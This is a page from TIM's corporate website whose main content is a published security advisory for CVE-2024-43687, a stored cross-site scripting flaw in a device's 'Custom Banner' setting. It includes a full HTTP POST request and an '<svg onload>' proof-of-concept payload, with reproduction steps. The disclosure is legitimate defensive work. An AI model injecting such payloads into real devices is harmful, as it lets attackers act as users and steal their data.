La nuova immagine di TIM
Una nuova immagine con uno stile dinamico, colori moderni e persone che occupano quasi interamente la scena. Scopri di più
Presentazione dei Risultati H1 2025
Vai alla pagina
La Sostenibilità per TIM
Il Report 2024 accoglie i principi della Corporate Sustainability Reporting Directive (CSRD) ed è incluso nella Relazione Finanziaria e di Sostenibilità. Approfondisci
Ultimi Comunicati Stampa
Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati
Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79
Software Version: 2.3.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687
CVSS: 6.1
Severity: Medium
Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
The field "Custom Banner" in tab "Banner config" has been found vulnerable to stored cross-site scripting (XSS) attacks. The script injected is executed by the browser when a user visits the banner page. This type of XSS is particularly dangerous because the malicious code is saved by the device and the commands are executed for any user that loads the page, until the device is reset.
Step-by-step instructions and PoC
A user, authenticated to the web application, can insert javascript code in the banner configuration.
Affected Endpoints
• URL: http://<device_IP>/bannerconfig
• HTTP Parameter: txtcustom
Below the evidence with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
POST /bannerconfig HTTP/1.1
Host: <device_IP>
Cookie: ci_session=2e5d6db87cf9104d4b8bfd4951665c2b96fffc24
Content-Length: 477
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://<device_IP>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryayaMItq0sXj5hiI2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://<device_IP>/bannerconfig
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="user_level"
1
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="bannerradio"
CUSTOMIZED
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="txtcustom"
<svg onload=alert(1000000)>
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="action"
applybanner
------WebKitFormBoundaryayaMItq0sXj5hiI2—
After logging, go to the panel ‘Admin’ -> ‘Banner Config’. Select ‘Custom Banner’ and insert the following javascript payload:
<svg onload=alert(1000000)>
Figure 7: Add javascript payload
Then click ‘Apply’. Finally, the javascript code is executed in the banner page at ‘https://<device_IP>’
Figure 8: Stored Cross-site Scripting
Security Impact
By using malicious javascript code the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. The attacker could: transfer private information from the victim's machine to the attacker, send malicious requests to a web site on behalf of the victim.